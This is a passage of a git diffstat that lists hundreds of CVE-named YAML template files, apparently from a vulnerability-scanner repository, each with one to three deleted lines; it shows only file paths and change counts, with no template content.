http/cves/2016/CVE-2016-1000155.yaml | 2 -- http/cves/2016/CVE-2016-10033.yaml | 2 -- http/cves/2016/CVE-2016-10134.yaml | 2 -- http/cves/2016/CVE-2016-10367.yaml | 2 -- http/cves/2016/CVE-2016-10368.yaml | 2 -- http/cves/2016/CVE-2016-10924.yaml | 2 -- http/cves/2016/CVE-2016-10940.yaml | 2 -- http/cves/2016/CVE-2016-10956.yaml | 2 -- http/cves/2016/CVE-2016-10960.yaml | 2 -- http/cves/2016/CVE-2016-10993.yaml | 2 -- http/cves/2016/CVE-2016-1555.yaml | 2 -- http/cves/2016/CVE-2016-2389.yaml | 2 -- http/cves/2016/CVE-2016-3081.yaml | 2 -- http/cves/2016/CVE-2016-3978.yaml | 2 -- http/cves/2016/CVE-2016-4975.yaml | 2 -- http/cves/2016/CVE-2016-4977.yaml | 2 -- http/cves/2016/CVE-2016-5649.yaml | 2 -- http/cves/2016/CVE-2016-6277.yaml | 2 -- http/cves/2016/CVE-2016-6601.yaml | 2 -- http/cves/2016/CVE-2016-7552.yaml | 2 -- http/cves/2016/CVE-2016-7834.yaml | 2 -- http/cves/2016/CVE-2016-7981.yaml | 2 -- http/cves/2016/CVE-2016-8527.yaml | 2 -- http/cves/2017/CVE-2017-0929.yaml | 2 -- http/cves/2017/CVE-2017-1000028.yaml | 2 -- http/cves/2017/CVE-2017-1000029.yaml | 2 -- http/cves/2017/CVE-2017-1000163.yaml | 2 -- http/cves/2017/CVE-2017-1000170.yaml | 2 -- http/cves/2017/CVE-2017-1000486.yaml | 2 -- http/cves/2017/CVE-2017-10075.yaml | 2 -- http/cves/2017/CVE-2017-10271.yaml | 2 -- http/cves/2017/CVE-2017-10974.yaml | 2 -- http/cves/2017/CVE-2017-11165.yaml | 2 -- http/cves/2017/CVE-2017-11444.yaml | 2 -- http/cves/2017/CVE-2017-11512.yaml | 2 -- http/cves/2017/CVE-2017-11586.yaml | 2 -- http/cves/2017/CVE-2017-11610.yaml | 2 -- http/cves/2017/CVE-2017-11629.yaml | 2 -- http/cves/2017/CVE-2017-12138.yaml | 2 -- http/cves/2017/CVE-2017-12149.yaml | 2 -- http/cves/2017/CVE-2017-12542.yaml | 2 -- http/cves/2017/CVE-2017-12544.yaml | 2 -- http/cves/2017/CVE-2017-12583.yaml | 2 -- http/cves/2017/CVE-2017-12611.yaml | 2 -- http/cves/2017/CVE-2017-12615.yaml | 2 -- http/cves/2017/CVE-2017-12629.yaml | 2 -- http/cves/2017/CVE-2017-12635.yaml | 2 -- http/cves/2017/CVE-2017-12637.yaml | 2 -- http/cves/2017/CVE-2017-12794.yaml | 2 -- http/cves/2017/CVE-2017-14135.yaml | 2 -- http/cves/2017/CVE-2017-14186.yaml | 2 -- http/cves/2017/CVE-2017-14524.yaml | 2 -- http/cves/2017/CVE-2017-14535.yaml | 2 -- http/cves/2017/CVE-2017-14537.yaml | 2 -- http/cves/2017/CVE-2017-14622.yaml | 2 -- http/cves/2017/CVE-2017-14651.yaml | 2 -- http/cves/2017/CVE-2017-14849.yaml | 2 -- http/cves/2017/CVE-2017-15287.yaml | 2 -- http/cves/2017/CVE-2017-15363.yaml | 2 -- http/cves/2017/CVE-2017-15647.yaml | 2 -- http/cves/2017/CVE-2017-15715.yaml | 2 -- http/cves/2017/CVE-2017-15944.yaml | 2 -- http/cves/2017/CVE-2017-16806.yaml | 3 --- http/cves/2017/CVE-2017-16877.yaml | 2 -- http/cves/2017/CVE-2017-16894.yaml | 2 -- http/cves/2017/CVE-2017-17043.yaml | 2 -- http/cves/2017/CVE-2017-17059.yaml | 2 -- http/cves/2017/CVE-2017-17451.yaml | 2 -- http/cves/2017/CVE-2017-17562.yaml | 1 - http/cves/2017/CVE-2017-17736.yaml | 2 -- http/cves/2017/CVE-2017-18024.yaml | 2 -- http/cves/2017/CVE-2017-18536.yaml | 2 -- http/cves/2017/CVE-2017-18598.yaml | 2 -- http/cves/2017/CVE-2017-18638.yaml | 2 -- http/cves/2017/CVE-2017-3506.yaml | 2 -- http/cves/2017/CVE-2017-3528.yaml | 2 -- http/cves/2017/CVE-2017-4011.yaml | 2 -- http/cves/2017/CVE-2017-5487.yaml | 2 -- http/cves/2017/CVE-2017-5521.yaml | 2 -- http/cves/2017/CVE-2017-5631.yaml | 2 -- http/cves/2017/CVE-2017-5638.yaml | 2 -- http/cves/2017/CVE-2017-5689.yaml | 2 -- http/cves/2017/CVE-2017-5982.yaml | 2 -- http/cves/2017/CVE-2017-6090.yaml | 2 -- http/cves/2017/CVE-2017-7269.yaml | 2 -- http/cves/2017/CVE-2017-7391.yaml | 2 -- http/cves/2017/CVE-2017-7615.yaml | 2 -- http/cves/2017/CVE-2017-7921.yaml | 2 -- http/cves/2017/CVE-2017-8917.yaml | 2 -- http/cves/2017/CVE-2017-9140.yaml | 2 -- http/cves/2017/CVE-2017-9288.yaml | 2 -- http/cves/2017/CVE-2017-9416.yaml | 2 -- http/cves/2017/CVE-2017-9506.yaml | 2 -- http/cves/2017/CVE-2017-9791.yaml | 2 -- http/cves/2017/CVE-2017-9805.yaml | 2 -- http/cves/2017/CVE-2017-9822.yaml | 2 -- http/cves/2017/CVE-2017-9833.yaml | 2 -- http/cves/2017/CVE-2017-9841.yaml | 2 -- http/cves/2018/CVE-2018-0127.yaml | 2 -- http/cves/2018/CVE-2018-0296.yaml | 2 -- http/cves/2018/CVE-2018-1000129.yaml | 2 -- http/cves/2018/CVE-2018-1000130.yaml | 2 -- http/cves/2018/CVE-2018-1000226.yaml | 2 -- http/cves/2018/CVE-2018-1000533.yaml | 2 -- http/cves/2018/CVE-2018-1000600.yaml | 2 -- http/cves/2018/CVE-2018-1000671.yaml | 2 -- http/cves/2018/CVE-2018-1000856.yaml | 2 -- http/cves/2018/CVE-2018-1000861.yaml | 2 -- http/cves/2018/CVE-2018-10093.yaml | 2 -- http/cves/2018/CVE-2018-10095.yaml | 2 -- http/cves/2018/CVE-2018-10141.yaml | 2 -- http/cves/2018/CVE-2018-10201.yaml | 2 -- http/cves/2018/CVE-2018-10230.yaml | 2 -- http/cves/2018/CVE-2018-10562.yaml | 2 -- http/cves/2018/CVE-2018-10818.yaml | 2 -- http/cves/2018/CVE-2018-10822.yaml | 2 -- http/cves/2018/CVE-2018-10823.yaml | 2 -- http/cves/2018/CVE-2018-10956.yaml | 2 -- http/cves/2018/CVE-2018-11227.yaml | 2 -- http/cves/2018/CVE-2018-11231.yaml | 2 -- http/cves/2018/CVE-2018-11409.yaml | 2 -- http/cves/2018/CVE-2018-11473.yaml | 2 -- http/cves/2018/CVE-2018-11709.yaml | 2 -- http/cves/2018/CVE-2018-11776.yaml | 2 -- http/cves/2018/CVE-2018-12031.yaml | 2 -- http/cves/2018/CVE-2018-12054.yaml | 2 -- http/cves/2018/CVE-2018-1207.yaml | 2 -- http/cves/2018/CVE-2018-12095.yaml | 2 -- http/cves/2018/CVE-2018-12296.yaml | 2 -- http/cves/2018/CVE-2018-12300.yaml | 2 -- http/cves/2018/CVE-2018-12613.yaml | 2 -- http/cves/2018/CVE-2018-12634.yaml | 2 -- http/cves/2018/CVE-2018-12675.yaml | 2 -- http/cves/2018/CVE-2018-1271.yaml | 2 -- http/cves/2018/CVE-2018-12998.yaml | 2 -- http/cves/2018/CVE-2018-1335.yaml | 2 -- http/cves/2018/CVE-2018-13379.yaml | 1 - http/cves/2018/CVE-2018-13380.yaml | 2 -- http/cves/2018/CVE-2018-13980.yaml | 2 -- http/cves/2018/CVE-2018-14013.yaml | 2 -- http/cves/2018/CVE-2018-14064.yaml | 2 -- http/cves/2018/CVE-2018-14474.yaml | 2 -- http/cves/2018/CVE-2018-14574.yaml | 2 -- http/cves/2018/CVE-2018-14728.yaml | 2 -- http/cves/2018/CVE-2018-14912.yaml | 2 -- http/cves/2018/CVE-2018-14916.yaml | 2 -- http/cves/2018/CVE-2018-14918.yaml | 2 -- http/cves/2018/CVE-2018-14931.yaml | 2 -- http/cves/2018/CVE-2018-15138.yaml | 2 -- http/cves/2018/CVE-2018-15517.yaml | 2 -- http/cves/2018/CVE-2018-15535.yaml | 2 -- http/cves/2018/CVE-2018-15745.yaml | 1 - http/cves/2018/CVE-2018-15961.yaml | 2 -- http/cves/2018/CVE-2018-16059.yaml | 2 -- http/cves/2018/CVE-2018-16133.yaml | 2 -- http/cves/2018/CVE-2018-16139.yaml | 2 -- http/cves/2018/CVE-2018-16159.yaml | 2 -- http/cves/2018/CVE-2018-16167.yaml | 2 -- http/cves/2018/CVE-2018-16283.yaml | 2 -- http/cves/2018/CVE-2018-16288.yaml | 2 -- http/cves/2018/CVE-2018-16299.yaml | 2 -- http/cves/2018/CVE-2018-16341.yaml | 2 -- http/cves/2018/CVE-2018-16668.yaml | 2 -- http/cves/2018/CVE-2018-16670.yaml | 2 -- http/cves/2018/CVE-2018-16671.yaml | 2 -- http/cves/2018/CVE-2018-16716.yaml | 2 -- http/cves/2018/CVE-2018-16761.yaml | 2 -- http/cves/2018/CVE-2018-16763.yaml | 2 -- http/cves/2018/CVE-2018-16836.yaml | 2 -- http/cves/2018/CVE-2018-16979.yaml | 2 -- http/cves/2018/CVE-2018-17246.yaml | 2 -- http/cves/2018/CVE-2018-17254.yaml | 2 -- http/cves/2018/CVE-2018-17422.yaml | 2 -- http/cves/2018/CVE-2018-17431.yaml | 2 -- http/cves/2018/CVE-2018-18069.yaml | 2 -- http/cves/2018/CVE-2018-18264.yaml | 1 - http/cves/2018/CVE-2018-18323.yaml | 2 -- http/cves/2018/CVE-2018-18570.yaml | 2 -- http/cves/2018/CVE-2018-18608.yaml | 2 -- http/cves/2018/CVE-2018-18775.yaml | 2 -- http/cves/2018/CVE-2018-18777.yaml | 2 -- http/cves/2018/CVE-2018-18778.yaml | 2 -- http/cves/2018/CVE-2018-18925.yaml | 2 -- http/cves/2018/CVE-2018-19136.yaml | 2 -- http/cves/2018/CVE-2018-19137.yaml | 2 -- http/cves/2018/CVE-2018-19287.yaml | 2 -- http/cves/2018/CVE-2018-19326.yaml | 2 -- http/cves/2018/CVE-2018-19365.yaml | 2 -- http/cves/2018/CVE-2018-19386.yaml | 2 -- http/cves/2018/CVE-2018-19439.yaml | 2 -- http/cves/2018/CVE-2018-19458.yaml | 2 -- http/cves/2018/CVE-2018-19749.yaml | 2 -- http/cves/2018/CVE-2018-19751.yaml | 2 -- http/cves/2018/CVE-2018-19752.yaml | 2 -- http/cves/2018/CVE-2018-19753.yaml | 2 -- http/cves/2018/CVE-2018-19877.yaml | 2 -- http/cves/2018/CVE-2018-19892.yaml | 2 -- http/cves/2018/CVE-2018-19914.yaml | 2 -- http/cves/2018/CVE-2018-19915.yaml | 2 -- http/cves/2018/CVE-2018-20009.yaml | 2 -- http/cves/2018/CVE-2018-20010.yaml | 2 -- http/cves/2018/CVE-2018-20011.yaml | 2 -- http/cves/2018/CVE-2018-20462.yaml | 2 -- http/cves/2018/CVE-2018-20463.yaml | 2 -- http/cves/2018/CVE-2018-20470.yaml | 1 - http/cves/2018/CVE-2018-20824.yaml | 2 -- http/cves/2018/CVE-2018-20985.yaml | 2 -- http/cves/2018/CVE-2018-2392.yaml | 2 -- http/cves/2018/CVE-2018-2791.yaml | 2 -- http/cves/2018/CVE-2018-2894.yaml | 2 -- http/cves/2018/CVE-2018-3167.yaml | 2 -- http/cves/2018/CVE-2018-3238.yaml | 2 -- http/cves/2018/CVE-2018-3714.yaml | 2 -- http/cves/2018/CVE-2018-3760.yaml | 2 -- http/cves/2018/CVE-2018-3810.yaml | 2 -- http/cves/2018/CVE-2018-5230.yaml | 2 -- http/cves/2018/CVE-2018-5233.yaml | 2 -- http/cves/2018/CVE-2018-5316.yaml | 2 -- http/cves/2018/CVE-2018-5715.yaml | 2 -- http/cves/2018/CVE-2018-6008.yaml | 2 -- http/cves/2018/CVE-2018-6184.yaml | 2 -- http/cves/2018/CVE-2018-6200.yaml | 2 -- http/cves/2018/CVE-2018-6910.yaml | 2 -- http/cves/2018/CVE-2018-7251.yaml | 3 --- http/cves/2018/CVE-2018-7422.yaml | 2 -- http/cves/2018/CVE-2018-7467.yaml | 2 -- http/cves/2018/CVE-2018-7490.yaml | 2 -- http/cves/2018/CVE-2018-7600.yaml | 2 -- http/cves/2018/CVE-2018-7602.yaml | 2 -- http/cves/2018/CVE-2018-7662.yaml | 2 -- http/cves/2018/CVE-2018-7700.yaml | 2 -- http/cves/2018/CVE-2018-7719.yaml | 2 -- http/cves/2018/CVE-2018-8006.yaml | 2 -- http/cves/2018/CVE-2018-8033.yaml | 2 -- http/cves/2018/CVE-2018-8715.yaml | 2 -- http/cves/2018/CVE-2018-8719.yaml | 2 -- http/cves/2018/CVE-2018-8727.yaml | 2 -- http/cves/2018/CVE-2018-8770.yaml | 2 -- http/cves/2018/CVE-2018-9118.yaml | 2 -- http/cves/2018/CVE-2018-9161.yaml | 2 -- http/cves/2018/CVE-2018-9205.yaml | 2 -- http/cves/2018/CVE-2018-9845.yaml | 2 -- http/cves/2018/CVE-2018-9995.yaml | 1 - http/cves/2019/CVE-2019-0221.yaml | 2 -- http/cves/2019/CVE-2019-0230.yaml | 2 -- http/cves/2019/CVE-2019-10068.yaml | 2 -- http/cves/2019/CVE-2019-10092.yaml | 2 -- http/cves/2019/CVE-2019-1010287.yaml | 2 -- http/cves/2019/CVE-2019-1010290.yaml | 2 -- http/cves/2019/CVE-2019-10232.yaml | 2 -- http/cves/2019/CVE-2019-10405.yaml | 2 -- http/cves/2019/CVE-2019-10475.yaml | 2 -- http/cves/2019/CVE-2019-10692.yaml | 2 -- http/cves/2019/CVE-2019-10717.yaml | 2 -- http/cves/2019/CVE-2019-10758.yaml | 2 -- http/cves/2019/CVE-2019-11013.yaml | 2 -- http/cves/2019/CVE-2019-11248.yaml | 2 -- http/cves/2019/CVE-2019-11370.yaml | 2 -- http/cves/2019/CVE-2019-11510.yaml | 2 -- http/cves/2019/CVE-2019-11580.yaml | 2 -- http/cves/2019/CVE-2019-11581.yaml | 2 -- http/cves/2019/CVE-2019-11869.yaml | 2 -- http/cves/2019/CVE-2019-12276.yaml | 2 -- http/cves/2019/CVE-2019-12314.yaml | 2 -- http/cves/2019/CVE-2019-12461.yaml | 2 -- http/cves/2019/CVE-2019-12581.yaml | 2 -- http/cves/2019/CVE-2019-12583.yaml | 2 -- http/cves/2019/CVE-2019-12593.yaml | 1 - http/cves/2019/CVE-2019-12616.yaml | 2 -- http/cves/2019/CVE-2019-12725.yaml | 2 -- http/cves/2019/CVE-2019-12962.yaml | 2 -- http/cves/2019/CVE-2019-12985.yaml | 2 -- http/cves/2019/CVE-2019-12986.yaml | 2 -- http/cves/2019/CVE-2019-12987.yaml | 2 -- http/cves/2019/CVE-2019-12988.yaml | 2 -- http/cves/2019/CVE-2019-12990.yaml | 2 -- http/cves/2019/CVE-2019-13101.yaml | 2 -- http/cves/2019/CVE-2019-13392.yaml | 2 -- http/cves/2019/CVE-2019-13396.yaml | 2 -- http/cves/2019/CVE-2019-13462.yaml | 2 -- http/cves/2019/CVE-2019-14205.yaml | 2 -- http/cves/2019/CVE-2019-14223.yaml | 2 -- http/cves/2019/CVE-2019-14251.yaml | 2 -- http/cves/2019/CVE-2019-14312.yaml | 2 -- http/cves/2019/CVE-2019-14322.yaml | 1 - http/cves/2019/CVE-2019-14470.yaml | 2 -- http/cves/2019/CVE-2019-14530.yaml | 2 -- http/cves/2019/CVE-2019-14696.yaml | 2 -- http/cves/2019/CVE-2019-14974.yaml | 2 -- http/cves/2019/CVE-2019-15043.yaml | 2 -- http/cves/2019/CVE-2019-15107.yaml | 2 -- http/cves/2019/CVE-2019-15501.yaml | 2 -- http/cves/2019/CVE-2019-15713.yaml | 2 -- http/cves/2019/CVE-2019-15811.yaml | 2 -- http/cves/2019/CVE-2019-15858.yaml | 1 - http/cves/2019/CVE-2019-15859.yaml | 2 -- http/cves/2019/CVE-2019-15889.yaml | 2 -- http/cves/2019/CVE-2019-16097.yaml | 2 -- http/cves/2019/CVE-2019-16123.yaml | 2 -- http/cves/2019/CVE-2019-16278.yaml | 2 -- http/cves/2019/CVE-2019-16313.yaml | 2 -- http/cves/2019/CVE-2019-16332.yaml | 2 -- http/cves/2019/CVE-2019-16525.yaml | 2 -- http/cves/2019/CVE-2019-1653.yaml | 1 - http/cves/2019/CVE-2019-16662.yaml | 2 -- http/cves/2019/CVE-2019-16759.yaml | 2 -- http/cves/2019/CVE-2019-16920.yaml | 2 -- http/cves/2019/CVE-2019-16931.yaml | 2 -- http/cves/2019/CVE-2019-16932.yaml | 2 -- http/cves/2019/CVE-2019-16996.yaml | 2 -- http/cves/2019/CVE-2019-16997.yaml | 2 -- http/cves/2019/CVE-2019-17270.yaml | 2 -- http/cves/2019/CVE-2019-17382.yaml | 3 --- http/cves/2019/CVE-2019-17418.yaml | 2 -- http/cves/2019/CVE-2019-17444.yaml | 1 - http/cves/2019/CVE-2019-17503.yaml | 2 -- http/cves/2019/CVE-2019-17506.yaml | 1 - http/cves/2019/CVE-2019-17538.yaml | 1 - http/cves/2019/CVE-2019-17558.yaml | 2 -- http/cves/2019/CVE-2019-1821.yaml | 2 -- http/cves/2019/CVE-2019-18371.yaml | 2 -- http/cves/2019/CVE-2019-18393.yaml | 2 -- http/cves/2019/CVE-2019-18665.yaml | 2 -- http/cves/2019/CVE-2019-18818.yaml | 3 --- http/cves/2019/CVE-2019-18922.yaml | 2 -- http/cves/2019/CVE-2019-18957.yaml | 2 -- http/cves/2019/CVE-2019-19134.yaml | 2 -- http/cves/2019/CVE-2019-19368.yaml | 2 -- http/cves/2019/CVE-2019-19781.yaml | 2 -- http/cves/2019/CVE-2019-19824.yaml | 2 -- http/cves/2019/CVE-2019-19908.yaml | 2 -- http/cves/2019/CVE-2019-19985.yaml | 2 -- http/cves/2019/CVE-2019-20085.yaml | 2 -- http/cves/2019/CVE-2019-20141.yaml | 2 -- http/cves/2019/CVE-2019-20210.yaml | 2 -- http/cves/2019/CVE-2019-20224.yaml | 2 -- http/cves/2019/CVE-2019-20933.yaml | 2 -- http/cves/2019/CVE-2019-2578.yaml | 3 --- http/cves/2019/CVE-2019-2579.yaml | 2 -- http/cves/2019/CVE-2019-2588.yaml | 2 -- http/cves/2019/CVE-2019-2616.yaml | 2 -- http/cves/2019/CVE-2019-2725.yaml | 2 -- http/cves/2019/CVE-2019-2729.yaml | 2 -- http/cves/2019/CVE-2019-2767.yaml | 2 -- http/cves/2019/CVE-2019-3396.yaml | 2 -- http/cves/2019/CVE-2019-3401.yaml | 2 -- http/cves/2019/CVE-2019-3402.yaml | 2 -- http/cves/2019/CVE-2019-3799.yaml | 2 -- http/cves/2019/CVE-2019-3911.yaml | 2 -- http/cves/2019/CVE-2019-3912.yaml | 2 -- http/cves/2019/CVE-2019-3929.yaml | 2 -- http/cves/2019/CVE-2019-5127.yaml | 2 -- http/cves/2019/CVE-2019-5418.yaml | 2 -- http/cves/2019/CVE-2019-5434.yaml | 2 -- http/cves/2019/CVE-2019-6112.yaml | 2 -- http/cves/2019/CVE-2019-6340.yaml | 2 -- http/cves/2019/CVE-2019-6715.yaml | 2 -- http/cves/2019/CVE-2019-6799.yaml | 2 -- http/cves/2019/CVE-2019-6802.yaml | 2 -- http/cves/2019/CVE-2019-7219.yaml | 2 -- http/cves/2019/CVE-2019-7238.yaml | 2 -- http/cves/2019/CVE-2019-7254.yaml | 2 -- http/cves/2019/CVE-2019-7255.yaml | 2 -- http/cves/2019/CVE-2019-7256.yaml | 2 -- http/cves/2019/CVE-2019-7275.yaml | 2 -- http/cves/2019/CVE-2019-7315.yaml | 2 -- http/cves/2019/CVE-2019-7481.yaml | 2 -- http/cves/2019/CVE-2019-7543.yaml | 2 -- http/cves/2019/CVE-2019-7609.yaml | 2 -- http/cves/2019/CVE-2019-8086.yaml | 2 -- http/cves/2019/CVE-2019-8442.yaml | 2 -- http/cves/2019/CVE-2019-8449.yaml | 2 -- http/cves/2019/CVE-2019-8451.yaml | 2 -- http/cves/2019/CVE-2019-8903.yaml | 2 -- http/cves/2019/CVE-2019-8937.yaml | 2 -- http/cves/2019/CVE-2019-8982.yaml | 3 --- http/cves/2019/CVE-2019-9041.yaml | 2 -- http/cves/2019/CVE-2019-9618.yaml | 2 -- http/cves/2019/CVE-2019-9670.yaml | 2 -- http/cves/2019/CVE-2019-9726.yaml | 2 -- http/cves/2019/CVE-2019-9733.yaml | 2 -- http/cves/2019/CVE-2019-9915.yaml | 2 -- http/cves/2019/CVE-2019-9922.yaml | 2 -- http/cves/2019/CVE-2019-9955.yaml | 2 -- http/cves/2019/CVE-2019-9978.yaml | 2 -- http/cves/2020/CVE-2020-0618.yaml | 2 -- http/cves/2020/CVE-2020-10148.yaml | 2 -- http/cves/2020/CVE-2020-10546.yaml | 2 -- http/cves/2020/CVE-2020-10547.yaml | 2 -- http/cves/2020/CVE-2020-10548.yaml | 2 -- http/cves/2020/CVE-2020-10549.yaml | 2 -- http/cves/2020/CVE-2020-10770.yaml | 2 -- http/cves/2020/CVE-2020-10973.yaml | 2 -- http/cves/2020/CVE-2020-11034.yaml | 2 -- http/cves/2020/CVE-2020-11110.yaml | 2 -- http/cves/2020/CVE-2020-11450.yaml | 2 -- http/cves/2020/CVE-2020-11455.yaml | 2 -- http/cves/2020/CVE-2020-11529.yaml | 2 -- http/cves/2020/CVE-2020-11530.yaml | 2 -- http/cves/2020/CVE-2020-11546.yaml | 2 -- http/cves/2020/CVE-2020-11547.yaml | 2 -- http/cves/2020/CVE-2020-11710.yaml | 2 -- http/cves/2020/CVE-2020-11738.yaml | 2 -- http/cves/2020/CVE-2020-11853.yaml | 2 -- http/cves/2020/CVE-2020-11854.yaml | 1 - http/cves/2020/CVE-2020-11930.yaml | 2 -- http/cves/2020/CVE-2020-11978.yaml | 2 -- http/cves/2020/CVE-2020-11991.yaml | 2 -- http/cves/2020/CVE-2020-12054.yaml | 2 -- http/cves/2020/CVE-2020-12116.yaml | 2 -- http/cves/2020/CVE-2020-12127.yaml | 2 -- http/cves/2020/CVE-2020-12447.yaml | 2 -- http/cves/2020/CVE-2020-12478.yaml | 2 -- http/cves/2020/CVE-2020-12720.yaml | 2 -- http/cves/2020/CVE-2020-12800.yaml | 1 - http/cves/2020/CVE-2020-13117.yaml | 1 - http/cves/2020/CVE-2020-13121.yaml | 2 -- http/cves/2020/CVE-2020-13158.yaml | 3 --- http/cves/2020/CVE-2020-13167.yaml | 2 -- http/cves/2020/CVE-2020-13258.yaml | 2 -- http/cves/2020/CVE-2020-13379.yaml | 2 -- http/cves/2020/CVE-2020-13405.yaml | 2 -- http/cves/2020/CVE-2020-13483.yaml | 2 -- http/cves/2020/CVE-2020-13700.yaml | 2 -- http/cves/2020/CVE-2020-13820.yaml | 2 -- http/cves/2020/CVE-2020-13927.yaml | 2 -- http/cves/2020/CVE-2020-13937.yaml | 2 -- http/cves/2020/CVE-2020-13942.yaml | 1 - http/cves/2020/CVE-2020-13945.yaml | 2 -- http/cves/2020/CVE-2020-14092.yaml | 2 -- http/cves/2020/CVE-2020-14144.yaml | 2 -- http/cves/2020/CVE-2020-14179.yaml | 2 -- http/cves/2020/CVE-2020-14181.yaml | 2 -- http/cves/2020/CVE-2020-14408.yaml | 2 -- http/cves/2020/CVE-2020-14413.yaml | 2 -- http/cves/2020/CVE-2020-14750.yaml | 2 -- http/cves/2020/CVE-2020-14864.yaml | 2 -- http/cves/2020/CVE-2020-14882.yaml | 3 --- http/cves/2020/CVE-2020-14883.yaml | 2 -- http/cves/2020/CVE-2020-15050.yaml | 2 -- http/cves/2020/CVE-2020-15129.yaml | 2 -- http/cves/2020/CVE-2020-15148.yaml | 2 -- http/cves/2020/CVE-2020-15227.yaml | 2 -- http/cves/2020/CVE-2020-15500.yaml | 2 -- http/cves/2020/CVE-2020-15505.yaml | 2 -- http/cves/2020/CVE-2020-15568.yaml | 2 -- http/cves/2020/CVE-2020-15867.yaml | 2 -- http/cves/2020/CVE-2020-15895.yaml | 2 -- http/cves/2020/CVE-2020-15920.yaml | 1 - http/cves/2020/CVE-2020-16139.yaml | 2 -- http/cves/2020/CVE-2020-16846.yaml | 1 - http/cves/2020/CVE-2020-16952.yaml | 2 -- http/cves/2020/CVE-2020-17362.yaml | 2 -- http/cves/2020/CVE-2020-17453.yaml | 2 -- http/cves/2020/CVE-2020-17456.yaml | 2 -- http/cves/2020/CVE-2020-17496.yaml | 3 --- http/cves/2020/CVE-2020-17505.yaml | 2 -- http/cves/2020/CVE-2020-17506.yaml | 2 -- http/cves/2020/CVE-2020-17518.yaml | 2 -- http/cves/2020/CVE-2020-17519.yaml | 2 -- http/cves/2020/CVE-2020-17526.yaml | 2 -- http/cves/2020/CVE-2020-17530.yaml | 2 -- http/cves/2020/CVE-2020-18268.yaml | 2 -- http/cves/2020/CVE-2020-19282.yaml | 2 -- http/cves/2020/CVE-2020-19283.yaml | 2 -- http/cves/2020/CVE-2020-19295.yaml | 2 -- http/cves/2020/CVE-2020-19360.yaml | 2 -- http/cves/2020/CVE-2020-1943.yaml | 2 -- http/cves/2020/CVE-2020-19625.yaml | 2 -- http/cves/2020/CVE-2020-20285.yaml | 2 -- http/cves/2020/CVE-2020-20300.yaml | 2 -- http/cves/2020/CVE-2020-2036.yaml | 2 -- http/cves/2020/CVE-2020-2096.yaml | 2 -- http/cves/2020/CVE-2020-20982.yaml | 2 -- http/cves/2020/CVE-2020-20988.yaml | 2 -- http/cves/2020/CVE-2020-21012.yaml | 2 -- http/cves/2020/CVE-2020-2103.yaml | 2 -- http/cves/2020/CVE-2020-21224.yaml | 2 -- http/cves/2020/CVE-2020-2140.yaml | 2 -- http/cves/2020/CVE-2020-22208.yaml | 2 -- http/cves/2020/CVE-2020-22209.yaml | 2 -- http/cves/2020/CVE-2020-22210.yaml | 2 -- http/cves/2020/CVE-2020-22211.yaml | 2 -- http/cves/2020/CVE-2020-22840.yaml | 2 -- http/cves/2020/CVE-2020-23015.yaml | 2 -- http/cves/2020/CVE-2020-23517.yaml | 2 -- http/cves/2020/CVE-2020-23575.yaml | 2 -- http/cves/2020/CVE-2020-23697.yaml | 2 -- http/cves/2020/CVE-2020-23972.yaml | 2 -- http/cves/2020/CVE-2020-24148.yaml | 2 -- http/cves/2020/CVE-2020-24223.yaml | 2 -- http/cves/2020/CVE-2020-24312.yaml | 2 -- http/cves/2020/CVE-2020-24391.yaml | 2 -- http/cves/2020/CVE-2020-24550.yaml | 2 -- http/cves/2020/CVE-2020-24571.yaml | 2 -- http/cves/2020/CVE-2020-24579.yaml | 2 -- http/cves/2020/CVE-2020-24589.yaml | 2 -- http/cves/2020/CVE-2020-24902.yaml | 2 -- http/cves/2020/CVE-2020-24903.yaml | 2 -- http/cves/2020/CVE-2020-24912.yaml | 2 -- http/cves/2020/CVE-2020-24949.yaml | 2 -- http/cves/2020/CVE-2020-25078.yaml | 2 -- http/cves/2020/CVE-2020-25223.yaml | 2 -- http/cves/2020/CVE-2020-25495.yaml | 2 -- http/cves/2020/CVE-2020-25506.yaml | 2 -- http/cves/2020/CVE-2020-2551.yaml | 2 -- http/cves/2020/CVE-2020-25540.yaml | 2 -- http/cves/2020/CVE-2020-25780.yaml | 2 -- http/cves/2020/CVE-2020-25864.yaml | 2 -- http/cves/2020/CVE-2020-26073.yaml | 2 -- http/cves/2020/CVE-2020-26153.yaml | 2 -- http/cves/2020/CVE-2020-26214.yaml | 2 -- http/cves/2020/CVE-2020-26217.yaml | 1 - http/cves/2020/CVE-2020-26248.yaml | 2 -- http/cves/2020/CVE-2020-26258.yaml | 2 -- http/cves/2020/CVE-2020-26413.yaml | 2 -- http/cves/2020/CVE-2020-26876.yaml | 2 -- http/cves/2020/CVE-2020-26919.yaml | 2 -- http/cves/2020/CVE-2020-26948.yaml | 2 -- http/cves/2020/CVE-2020-27191.yaml | 2 -- http/cves/2020/CVE-2020-2733.yaml | 2 -- http/cves/2020/CVE-2020-27361.yaml | 2 -- http/cves/2020/CVE-2020-27467.yaml | 2 -- http/cves/2020/CVE-2020-27735.yaml | 2 -- http/cves/2020/CVE-2020-27866.yaml | 2 -- http/cves/2020/CVE-2020-27982.yaml | 2 -- http/cves/2020/CVE-2020-27986.yaml | 2 -- http/cves/2020/CVE-2020-28188.yaml | 2 -- http/cves/2020/CVE-2020-28208.yaml | 2 -- http/cves/2020/CVE-2020-28351.yaml | 2 -- http/cves/2020/CVE-2020-28976.yaml | 2 -- http/cves/2020/CVE-2020-29164.yaml | 2 -- http/cves/2020/CVE-2020-29227.yaml | 2 -- http/cves/2020/CVE-2020-29284.yaml | 2 -- http/cves/2020/CVE-2020-29395.yaml | 2 -- http/cves/2020/CVE-2020-29453.yaml | 2 -- http/cves/2020/CVE-2020-29597.yaml | 2 -- http/cves/2020/CVE-2020-3187.yaml | 2 -- http/cves/2020/CVE-2020-3452.yaml | 2 -- http/cves/2020/CVE-2020-35234.yaml | 2 -- http/cves/2020/CVE-2020-35338.yaml | 2 -- http/cves/2020/CVE-2020-35476.yaml | 2 -- http/cves/2020/CVE-2020-35489.yaml | 2 -- http/cves/2020/CVE-2020-35580.yaml | 2 -- http/cves/2020/CVE-2020-35598.yaml | 2 -- http/cves/2020/CVE-2020-35713.yaml | 2 -- http/cves/2020/CVE-2020-35729.yaml | 2 -- http/cves/2020/CVE-2020-35736.yaml | 2 -- http/cves/2020/CVE-2020-35749.yaml | 2 -- http/cves/2020/CVE-2020-35774.yaml | 2 -- http/cves/2020/CVE-2020-3580.yaml | 2 -- http/cves/2020/CVE-2020-35846.yaml | 2 -- http/cves/2020/CVE-2020-35848.yaml | 2 -- http/cves/2020/CVE-2020-35951.yaml | 2 -- http/cves/2020/CVE-2020-36112.yaml | 2 -- 